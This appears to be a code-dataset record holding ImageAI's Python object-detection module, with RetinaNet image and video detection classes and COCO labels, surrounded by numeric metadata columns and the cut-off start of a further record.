| 0
| 0
| 0.39046
| 18,532
| 703
| 116
| 26.361309
| 0.839235
| 0.130261
| 0
| 0.86711
| 0
| 0
| 0.157209
| 0.01289
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033223
| false
| 0
| 0.013289
| 0
| 0.109635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f00bd0bbba4acd1cedbfe669b3a342a769e8c9e
| 46,399
|
py
|
Python
|
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
import cv2
from imageai.Detection.keras_retinanet.models.resnet import resnet50_retinanet
from imageai.Detection.keras_retinanet.utils.image import read_image_bgr, read_image_array, read_image_stream, preprocess_image, resize_image
from imageai.Detection.keras_retinanet.utils.visualization import draw_box, draw_caption
from imageai.Detection.keras_retinanet.utils.colors import label_color
import matplotlib.pyplot as plt
import matplotlib.image as pltimage
import numpy as np
import tensorflow as tf
import os
def get_session():
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
return tf.Session(config=config)
class ObjectDetection:
"""
This is the object detection class for images in the ImageAI library. It provides support for RetinaNet
object detection network . After instantiating this class, you can set it's properties and
make object detections using it's pre-defined functions.
The following functions are required to be called before object detection can be made
* setModelPath()
* At least of of the following and it must correspond to the model set in the setModelPath()
[setModelTypeAsRetinaNet()]
* loadModel() [This must be called once only before performing object detection]
Once the above functions have been called, you can call the detectObjectsFromImage() function of
the object detection instance object at anytime to obtain observable objects in any image.
"""
def __init__(self):
self.__modelType = ""
self.modelPath = ""
self.__modelPathAdded = False
self.__modelLoaded = False
self.__model_collection = []
self.__input_image_min = 1333
self.__input_image_max = 800
self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',
7: 'truck', 8: 'boat', 9: 'traffic_light', 10: 'fire_hydrant', 11: 'stop_sign', 12: 'parking_meter',
13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',
21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',
28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports_ball', 33: 'kite',
34: 'baseball_bat', 35: 'baseball_glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis_racket',
39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',
46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',
53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted_plant', 59: 'bed',
60: 'dining_table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',
67: 'cell_phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',
73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',
79: 'toothbrush'}
def setModelTypeAsRetinaNet(self):
"""
'setModelTypeAsRetinaNet()' is used to set the model type to the RetinaNet model
for the object detection instance instance object .
:return:
"""
self.__modelType = "retinanet"
def setModelPath(self, model_path):
"""
'setModelPath()' function is required and is used to set the file path to a the RetinaNet
object detection model trained on the COCO dataset.
:param model_path:
:return:
"""
if(self.__modelPathAdded == False):
self.modelPath = model_path
self.__modelPathAdded = True
def loadModel(self, detection_speed="normal"):
"""
'loadModel()' function is required and is used to load the model structure into the program from the file path defined
in the setModelPath() function. This function receives an optional value which is "detection_speed".
The value is used to reduce the time it takes to detect objects in an image, down to about a 10% of the normal time, with
with just slight reduction in the number of objects detected.
* prediction_speed (optional); Acceptable values are "normal", "fast", "faster", "fastest" and "flash"
:param detection_speed:
:return:
"""
if(detection_speed=="normal"):
self.__input_image_min = 800
self.__input_image_max = 1333
elif(detection_speed=="fast"):
self.__input_image_min = 400
self.__input_image_max = 700
elif(detection_speed=="faster"):
self.__input_image_min = 300
self.__input_image_max = 500
elif (detection_speed == "fastest"):
self.__input_image_min = 200
self.__input_image_max = 350
elif (detection_speed == "flash"):
self.__input_image_min = 100
self.__input_image_max = 250
if (self.__modelLoaded == False):
if(self.__modelType == ""):
raise ValueError("You must set a valid model type before loading the model.")
elif(self.__modelType == "retinanet"):
model = resnet50_retinanet(num_classes=80)
model.load_weights(self.modelPath)
self.__model_collection.append(model)
self.__modelLoaded = True
def detectObjectsFromImage(self, input_image="", output_image_path="", input_type="file", output_type="file", extract_detected_objects = False, minimum_percentage_probability = 50):
"""
'detectObjectsFromImage()' function is used to detect objects observable in the given image path:
* input_image , which can be file to path, image numpy array or image file stream
* output_image_path (only if output_type = file) , file path to the output image that will contain the detection boxes and label, if output_type="file"
* input_type (optional) , file path/numpy array/image file stream of the image. Acceptable values are "file", "array" and "stream"
* output_type (optional) , file path/numpy array/image file stream of the image. Acceptable values are "file" and "array"
* extract_detected_objects (optional) , option to save each object detected individually as an image and return an array of the objects' image path.
* minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.
The values returned by this function depends on the parameters parsed. The possible values returnable
are stated as below
- If extract_detected_objects = False or at its default value and output_type = 'file' or
at its default value, you must parse in the 'output_image_path' as a string to the path you want
the detected image to be saved. Then the function will return:
1. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
- If extract_detected_objects = False or at its default value and output_type = 'array' ,
Then the function will return:
1. a numpy array of the detected image
2. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
- If extract_detected_objects = True and output_type = 'file' or
at its default value, you must parse in the 'output_image_path' as a string to the path you want
the detected image to be saved. Then the function will return:
1. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
2. an array of string paths to the image of each object extracted from the image
- If extract_detected_objects = True and output_type = 'array', the the function will return:
1. a numpy array of the detected image
2. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
3. an array of numpy arrays of each object detected in the image
:param input_image:
:param output_image_path:
:param input_type:
:param output_type:
:param extract_detected_objects:
:param minimum_percentage_probability:
:return output_objects_array:
:return detected_copy:
:return detected_detected_objects_image_array:
"""
if(self.__modelLoaded == False):
raise ValueError("You must call the loadModel() function before making object detection.")
elif(self.__modelLoaded == True):
try:
output_objects_array = []
detected_objects_image_array = []
if(input_type=="file"):
image = read_image_bgr(input_image)
elif(input_type=="array"):
image = read_image_array(input_image)
elif(input_type=="stream"):
image = read_image_stream(input_image)
detected_copy = image.copy()
detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
detected_copy2 = image.copy()
detected_copy2 = cv2.cvtColor(detected_copy2, cv2.COLOR_BGR2RGB)
image = preprocess_image(image)
image, scale = resize_image(image, min_side=self.__input_image_min, max_side=self.__input_image_max)
model = self.__model_collection[0]
_, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))
predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
detections[0, :, :4] /= scale
min_probability = minimum_percentage_probability / 100
counting = 0
for index, (label, score), in enumerate(zip(predicted_numbers, scores)):
if score < min_probability:
continue
counting += 1
objects_dir = output_image_path + "-objects"
if(extract_detected_objects == True and output_type=="file"):
if (os.path.exists(objects_dir) == False):
os.mkdir(objects_dir)
color = label_color(label)
detection_details = detections[0, index, :4].astype(int)
draw_box(detected_copy, detection_details, color=color)
caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
draw_caption(detected_copy, detection_details, caption)
each_object_details = {}
each_object_details["name"] = self.numbers_to_names[label]
each_object_details["percentage_probability"] = str(score * 100)
output_objects_array.append(each_object_details)
if(extract_detected_objects == True):
splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],
detection_details[0]:detection_details[2]]
if(output_type=="file"):
splitted_image_path = os.path.join(objects_dir, self.numbers_to_names[label] + "-" + str(
counting) + ".jpg")
pltimage.imsave(splitted_image_path, splitted_copy)
detected_objects_image_array.append(splitted_image_path)
elif(output_type=="array"):
detected_objects_image_array.append(splitted_copy)
if(output_type=="file"):
pltimage.imsave(output_image_path, detected_copy)
if(extract_detected_objects == True):
if(output_type=="file"):
return output_objects_array, detected_objects_image_array
elif(output_type=="array"):
return detected_copy, output_objects_array, detected_objects_image_array
else:
if (output_type == "file"):
return output_objects_array
elif (output_type == "array"):
return detected_copy, output_objects_array
except:
raise ValueError("Ensure you specified correct input image, input type, output type and/or output image path ")
def CustomObjects(self, person=False, bicycle=False, car=False, motorcycle=False, airplane=False,
bus=False, train=False, truck=False, boat=False, traffic_light=False, fire_hydrant=False, stop_sign=False,
parking_meter=False, bench=False, bird=False, cat=False, dog=False, horse=False, sheep=False, cow=False, elephant=False, bear=False, zebra=False,
giraffe=False, backpack=False, umbrella=False, handbag=False, tie=False, suitcase=False, frisbee=False, skis=False, snowboard=False,
sports_ball=False, kite=False, baseball_bat=False, baseball_glove=False, skateboard=False, surfboard=False, tennis_racket=False,
bottle=False, wine_glass=False, cup=False, fork=False, knife=False, spoon=False, bowl=False, banana=False, apple=False, sandwich=False, orange=False,
broccoli=False, carrot=False, hot_dog=False, pizza=False, donot=False, cake=False, chair=False, couch=False, potted_plant=False, bed=False,
dining_table=False, toilet=False, tv=False, laptop=False, mouse=False, remote=False, keyboard=False, cell_phone=False, microwave=False,
oven=False, toaster=False, sink=False, refrigerator=False, book=False, clock=False, vase=False, scissors=False, teddy_bear=False, hair_dryer=False,
toothbrush=False):
"""
The 'CustomObjects()' function allows you to handpick the type of objects you want to detect
from an image. The objects are pre-initiated in the function variables and predefined as 'False',
which you can easily set to true for any number of objects available. This function
returns a dictionary which must be parsed into the 'detectCustomObjectsFromImage()'. Detecting
custom objects only happens when you call the function 'detectCustomObjectsFromImage()'
* true_values_of_objects (array); Acceptable values are 'True' and False for all object values present
:param boolean_values:
:return: custom_objects_dict
"""
custom_objects_dict = {}
input_values = [person, bicycle, car, motorcycle, airplane,
bus, train, truck, boat, traffic_light, fire_hydrant, stop_sign,
parking_meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra,
giraffe, backpack, umbrella, handbag, tie, suitcase, frisbee, skis, snowboard,
sports_ball, kite, baseball_bat, baseball_glove, skateboard, surfboard, tennis_racket,
bottle, wine_glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange,
broccoli, carrot, hot_dog, pizza, donot, cake, chair, couch, potted_plant, bed,
dining_table, toilet, tv, laptop, mouse, remote, keyboard, cell_phone, microwave,
oven, toaster, sink, refrigerator, book, clock, vase, scissors, teddy_bear, hair_dryer,
toothbrush]
actual_labels = ["person", "bicycle", "car", "motorcycle", "airplane",
"bus", "train", "truck", "boat", "traffic_light", "fire_hydrant", "stop_sign",
"parking_meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
"giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis", "snowboard",
"sports_ball", "kite", "baseball_bat", "baseball_glove", "skateboard", "surfboard", "tennis_racket",
"bottle", "wine glass", "cup", "fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich", "orange",
"broccoli", "carrot", "hot dog", "pizza", "donot", "cake", "chair", "couch", "potted_plant", "bed",
"dining_table", "toilet", "tv", "laptop", "mouse", "remote", "keyboard", "cell_phone", "microwave",
"oven", "toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair_dryer",
"toothbrush"]
for input_value, actual_label in zip(input_values, actual_labels):
if(input_value == True):
custom_objects_dict[actual_label] = "valid"
else:
custom_objects_dict[actual_label] = "invalid"
return custom_objects_dict
def detectCustomObjectsFromImage(self, custom_objects=None, input_image="", output_image_path="", input_type="file", output_type="file", extract_detected_objects = False, minimum_percentage_probability = 50):
"""
'detectCustomObjectsFromImage()' function is used to detect predefined objects observable in the given image path:
* custom_objects , an instance of the CustomObject class to filter which objects to detect
* input_image , which can be file to path, image numpy array or image file stream
* output_image_path , file path to the output image that will contain the detection boxes and label, if output_type="file"
* input_type (optional) , file path/numpy array/image file stream of the image. Acceptable values are "file", "array" and "stream"
* output_type (optional) , file path/numpy array/image file stream of the image. Acceptable values are "file" and "array"
* extract_detected_objects (optional, False by default) , option to save each object detected individually as an image and return an array of the objects' image path.
* minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.
The values returned by this function depends on the parameters parsed. The possible values returnable
are stated as below
- If extract_detected_objects = False or at its default value and output_type = 'file' or
at its default value, you must parse in the 'output_image_path' as a string to the path you want
the detected image to be saved. Then the function will return:
1. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
- If extract_detected_objects = False or at its default value and output_type = 'array' ,
Then the function will return:
1. a numpy array of the detected image
2. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
- If extract_detected_objects = True and output_type = 'file' or
at its default value, you must parse in the 'output_image_path' as a string to the path you want
the detected image to be saved. Then the function will return:
1. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
2. an array of string paths to the image of each object extracted from the image
- If extract_detected_objects = True and output_type = 'array', the the function will return:
1. a numpy array of the detected image
2. an array of dictionaries, with each dictionary corresponding to the objects
detected in the image. Each dictionary contains the following property:
* name
* percentage_probability
3. an array of numpy arrays of each object detected in the image
:param input_image:
:param output_image_path:
:param input_type:
:param output_type:
:param extract_detected_objects:
:param minimum_percentage_probability:
:return output_objects_array:
:return detected_copy:
:return detected_detected_objects_image_array:
"""
if (self.__modelLoaded == False):
raise ValueError("You must call the loadModel() function before making object detection.")
elif (self.__modelLoaded == True):
try:
output_objects_array = []
detected_objects_image_array = []
if (input_type == "file"):
image = read_image_bgr(input_image)
elif (input_type == "array"):
image = read_image_array(input_image)
elif (input_type == "stream"):
image = read_image_stream(input_image)
detected_copy = image.copy()
detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
detected_copy2 = image.copy()
detected_copy2 = cv2.cvtColor(detected_copy2, cv2.COLOR_BGR2RGB)
image = preprocess_image(image)
image, scale = resize_image(image, min_side=self.__input_image_min, max_side=self.__input_image_max)
model = self.__model_collection[0]
_, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))
predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
detections[0, :, :4] /= scale
min_probability = minimum_percentage_probability / 100
counting = 0
for index, (label, score), in enumerate(zip(predicted_numbers, scores)):
if score < min_probability:
continue
if(custom_objects != None):
check_name = self.numbers_to_names[label]
if (custom_objects[check_name] == "invalid"):
continue
counting += 1
objects_dir = output_image_path + "-objects"
if (extract_detected_objects == True and output_type == "file"):
if (os.path.exists(objects_dir) == False):
os.mkdir(objects_dir)
color = label_color(label)
detection_details = detections[0, index, :4].astype(int)
draw_box(detected_copy, detection_details, color=color)
caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
draw_caption(detected_copy, detection_details, caption)
each_object_details = {}
each_object_details["name"] = self.numbers_to_names[label]
each_object_details["percentage_probability"] = str(score * 100)
output_objects_array.append(each_object_details)
if (extract_detected_objects == True):
splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],
detection_details[0]:detection_details[2]]
if (output_type == "file"):
splitted_image_path = os.path.join(objects_dir, self.numbers_to_names[label] + "-" + str(
counting) + ".jpg")
pltimage.imsave(splitted_image_path, splitted_copy)
detected_objects_image_array.append(splitted_image_path)
elif (output_type == "array"):
detected_objects_image_array.append(splitted_copy)
if (output_type == "file"):
pltimage.imsave(output_image_path, detected_copy)
if (extract_detected_objects == True):
if (output_type == "file"):
return output_objects_array, detected_objects_image_array
elif (output_type == "array"):
return detected_copy, output_objects_array, detected_objects_image_array
else:
if (output_type == "file"):
return output_objects_array
elif (output_type == "array"):
return detected_copy, output_objects_array
except:
raise ValueError(
"Ensure you specified correct input image, input type, output type and/or output image path ")
class VideoObjectDetection:
"""
*** THIS VERSION OF THE VideoObjectDetection CLASS IS A PREVIEW VERSION ***
This is the object detection class for videos in the ImageAI library. It provides support for RetinaNet
object detection network . After instantiating this class, you can set it's properties and
make object detections using it's pre-defined functions.
The following functions are required to be called before object detection can be made
* setModelPath()
* At least of of the following and it must correspond to the model set in the setModelPath()
[setModelTypeAsRetinaNet()]
* loadModel() [This must be called once only before performing object detection]
Once the above functions have been called, you can call the detectObjectsFromVideo() function of
the object detection instance object at anytime to obtain observable objects in any video.
"""
def __init__(self):
self.__modelType = ""
self.modelPath = ""
self.__modelPathAdded = False
self.__modelLoaded = False
self.__model_collection = []
self.__input_image_min = 1333
self.__input_image_max = 800
self.__detection_storage = None
self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',
7: 'truck', 8: 'boat', 9: 'traffic_light', 10: 'fire_hydrant', 11: 'stop_sign', 12: 'parking_meter',
13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',
21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',
28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports_ball', 33: 'kite',
34: 'baseball_bat', 35: 'baseball_glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis_racket',
39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',
46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',
53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted_plant', 59: 'bed',
60: 'dining_table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',
67: 'cell_phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',
73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',
79: 'toothbrush'}
def setModelTypeAsRetinaNet(self):
"""
'setModelTypeAsRetinaNet()' is used to set the model type to the RetinaNet model
for the object detection instance instance object .
:return:
"""
self.__modelType = "retinanet"
def setModelPath(self, model_path):
"""
'setModelPath()' function is required and is used to set the file path to a the RetinaNet
object detection model trained on the COCO dataset.
:param model_path:
:return:
"""
if(self.__modelPathAdded == False):
self.modelPath = model_path
self.__modelPathAdded = True
def loadModel(self, detection_speed="normal"):
"""
'loadModel()' function is required and is used to load the model structure into the program from the file path defined
in the setModelPath() function. This function receives an optional value which is "detection_speed".
The value is used to reduce the time it takes to detect objects in an image, down to about a 10% of the normal time, with
with just slight reduction in the number of objects detected.
* prediction_speed (optional); Acceptable values are "normal", "fast", "faster", "fastest" and "flash"
:param detection_speed:
:return:
"""
if(detection_speed=="normal"):
self.__input_image_min = 800
self.__input_image_max = 1333
elif(detection_speed=="fast"):
self.__input_image_min = 400
self.__input_image_max = 700
elif(detection_speed=="faster"):
self.__input_image_min = 300
self.__input_image_max = 500
elif (detection_speed == "fastest"):
self.__input_image_min = 200
self.__input_image_max = 350
elif (detection_speed == "flash"):
self.__input_image_min = 100
self.__input_image_max = 250
if (self.__modelLoaded == False):
if(self.__modelType == ""):
raise ValueError("You must set a valid model type before loading the model.")
elif(self.__modelType == "retinanet"):
model = resnet50_retinanet(num_classes=80)
model.load_weights(self.modelPath)
self.__model_collection.append(model)
self.__modelLoaded = True
def detectObjectsFromVideo(self, input_file_path="", output_file_path="", frames_per_second=20, frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False):
"""
'detectObjectsFromVideo()' function is used to detect objects observable in the given video path:
* input_file_path , which is the file path to the input video
* output_file_path , which is the path to the output video
* frames_per_second , which is the number of frames to be used in the output video
* frame_detection_interval (optional, 1 by default) , which is the intervals of frames that will be detected.
* minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.
* log_progress (optional) , which states if the progress of the frame processed is to be logged to console
:param input_file_path:
:param output_file_path:
:param frames_per_second:
:param frame_detection_interval:
:param minimum_percentage_probability:
:param log_progress:
:return output_video_filepath:
"""
if(input_file_path == "" or output_file_path ==""):
raise ValueError("You must set 'input_file_path' to a valid video file, and the 'output_file_path' to path you want the detected video saved.")
else:
try:
input_video = cv2.VideoCapture(input_file_path)
output_video_filepath = output_file_path + '.avi'
frame_width = int(input_video.get(3))
frame_height = int(input_video.get(4))
output_video = cv2.VideoWriter(output_video_filepath, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), frames_per_second,
(frame_width, frame_height))
counting = 0
predicted_numbers = None
scores = None
detections = None
model = self.__model_collection[0]
while (input_video.isOpened()):
ret, frame = input_video.read()
if (ret == True):
counting += 1
if(log_progress == True):
print("Processing Frame : ", str(counting))
detected_copy = frame.copy()
detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
frame = preprocess_image(frame)
frame, scale = resize_image(frame, min_side=self.__input_image_min, max_side=self.__input_image_max)
check_frame_interval = counting % frame_detection_interval
if(counting == 1 or check_frame_interval == 0):
_, _, detections = model.predict_on_batch(np.expand_dims(frame, axis=0))
predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
detections[0, :, :4] /= scale
min_probability = minimum_percentage_probability / 100
for index, (label, score), in enumerate(zip(predicted_numbers, scores)):
if score < min_probability:
continue
color = label_color(label)
detection_details = detections[0, index, :4].astype(int)
draw_box(detected_copy, detection_details, color=color)
caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
draw_caption(detected_copy, detection_details, caption)
output_video.write(detected_copy)
else:
break
input_video.release()
output_video.release()
return output_video_filepath
except:
raise ValueError("An error occured. It may be that your input video is invalid.")
def CustomObjects(self, person=False, bicycle=False, car=False, motorcycle=False, airplane=False,
bus=False, train=False, truck=False, boat=False, traffic_light=False, fire_hydrant=False, stop_sign=False,
parking_meter=False, bench=False, bird=False, cat=False, dog=False, horse=False, sheep=False, cow=False, elephant=False, bear=False, zebra=False,
giraffe=False, backpack=False, umbrella=False, handbag=False, tie=False, suitcase=False, frisbee=False, skis=False, snowboard=False,
sports_ball=False, kite=False, baseball_bat=False, baseball_glove=False, skateboard=False, surfboard=False, tennis_racket=False,
bottle=False, wine_glass=False, cup=False, fork=False, knife=False, spoon=False, bowl=False, banana=False, apple=False, sandwich=False, orange=False,
broccoli=False, carrot=False, hot_dog=False, pizza=False, donot=False, cake=False, chair=False, couch=False, potted_plant=False, bed=False,
dining_table=False, toilet=False, tv=False, laptop=False, mouse=False, remote=False, keyboard=False, cell_phone=False, microwave=False,
oven=False, toaster=False, sink=False, refrigerator=False, book=False, clock=False, vase=False, scissors=False, teddy_bear=False, hair_dryer=False,
toothbrush=False):
"""
The 'CustomObjects()' function allows you to handpick the type of objects you want to detect
from a video. The objects are pre-initiated in the function variables and predefined as 'False',
which you can easily set to true for any number of objects available. This function
returns a dictionary which must be parsed into the 'detectCustomObjectsFromVideo()'. Detecting
custom objects only happens when you call the function 'detectCustomObjectsFromVideo()'
* true_values_of_objects (array); Acceptable values are 'True' and False for all object values present
:param boolean_values:
:return: custom_objects_dict
"""
custom_objects_dict = {}
input_values = [person, bicycle, car, motorcycle, airplane,
bus, train, truck, boat, traffic_light, fire_hydrant, stop_sign,
parking_meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra,
giraffe, backpack, umbrella, handbag, tie, suitcase, frisbee, skis, snowboard,
sports_ball, kite, baseball_bat, baseball_glove, skateboard, surfboard, tennis_racket,
bottle, wine_glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange,
broccoli, carrot, hot_dog, pizza, donot, cake, chair, couch, potted_plant, bed,
dining_table, toilet, tv, laptop, mouse, remote, keyboard, cell_phone, microwave,
oven, toaster, sink, refrigerator, book, clock, vase, scissors, teddy_bear, hair_dryer,
toothbrush]
actual_labels = ["person", "bicycle", "car", "motorcycle", "airplane",
"bus", "train", "truck", "boat", "traffic_light", "fire_hydrant", "stop_sign",
"parking_meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
"giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis", "snowboard",
"sports_ball", "kite", "baseball_bat", "baseball_glove", "skateboard", "surfboard", "tennis_racket",
"bottle", "wine glass", "cup", "fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich", "orange",
"broccoli", "carrot", "hot dog", "pizza", "donot", "cake", "chair", "couch", "potted_plant", "bed",
"dining_table", "toilet", "tv", "laptop", "mouse", "remote", "keyboard", "cell_phone", "microwave",
"oven", "toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair_dryer",
"toothbrush"]
for input_value, actual_label in zip(input_values, actual_labels):
if(input_value == True):
custom_objects_dict[actual_label] = "valid"
else:
custom_objects_dict[actual_label] = "invalid"
return custom_objects_dict
def detectCustomObjectsFromVideo(self, custom_objects=None, input_file_path="", output_file_path="", frames_per_second=20, frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False):
"""
'detectCustomObjectsFromVideo()' function is used to detect specific object(s) observable in the given video path:
* custom_objects , which is the dictionary returned by the 'CustomObjects' function
* input_file_path , which is the file path to the input video
* output_file_path , which is the path to the output video
* frames_per_second , which is the number of frames to be used in the output video
* frame_detection_interval (optional, 1 by default) , which is the intervals of frames that will be detected.
* minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.
* log_progress (optional) , which states if the progress of the frame processed is to be logged to console
:param custom_objects:
:param input_file_path:
:param output_file_path:
:param frames_per_second:
:param frame_detection_interval:
:param minimum_percentage_probability:
:param log_progress:
:return output_video_filepath:
"""
if(input_file_path == "" or output_file_path ==""):
raise ValueError("You must set 'input_file_path' to a valid video file, and the 'output_file_path' to path you want the detected video saved.")
else:
try:
input_video = cv2.VideoCapture(input_file_path)
output_video_filepath = output_file_path + '.avi'
frame_width = int(input_video.get(3))
frame_height = int(input_video.get(4))
output_video = cv2.VideoWriter(output_file_path + '.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), frames_per_second,
(frame_width, frame_height))
counting = 0
predicted_numbers = None
scores = None
detections = None
model = self.__model_collection[0]
while (input_video.isOpened()):
ret, frame = input_video.read()
if (ret == True):
counting += 1
if (log_progress == True):
print("Processing Frame : ", str(counting))
detected_copy = frame.copy()
detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)
frame = preprocess_image(frame)
frame, scale = resize_image(frame, min_side=self.__input_image_min, max_side=self.__input_image_max)
check_frame_interval = counting % frame_detection_interval
if (counting == 1 or check_frame_interval == 0):
_, _, detections = model.predict_on_batch(np.expand_dims(frame, axis=0))
predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
detections[0, :, :4] /= scale
min_probability = minimum_percentage_probability / 100
for index, (label, score), in enumerate(zip(predicted_numbers, scores)):
if score < min_probability:
continue
if (custom_objects != None):
check_name = self.numbers_to_names[label]
if (custom_objects[check_name] == "invalid"):
continue
color = label_color(label)
detection_details = detections[0, index, :4].astype(int)
draw_box(detected_copy, detection_details, color=color)
caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
draw_caption(detected_copy, detection_details, caption)
output_video.write(detected_copy)
else:
break
input_video.release()
output_video.release()
return output_video_filepath
except:
raise ValueError("An error occured. It may be that your input video is invalid.")
| 54.45892
| 212
| 0.58012
| 5,038
| 46,399
| 5.142318
| 0.100437
| 0.017756
| 0.017833
| 0.010499
| 0.956382
| 0.95175
| 0.945768
| 0.94156
| 0.94156
| 0.94156
| 0
| 0.018386
| 0.333003
| 46,399
| 851
| 213
| 54.522914
| 0.818728
| 0.278993
| 0
| 0.940092
| 0
| 0.004608
| 0.112056
| 0.001451
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034562
| false
| 0
| 0.023041
| 0
| 0.092166
| 0.004608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e2d213e75bd248ac4c61f5cf2a0e2b28ed22ffc
| 8,593
|
py
|
Python
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
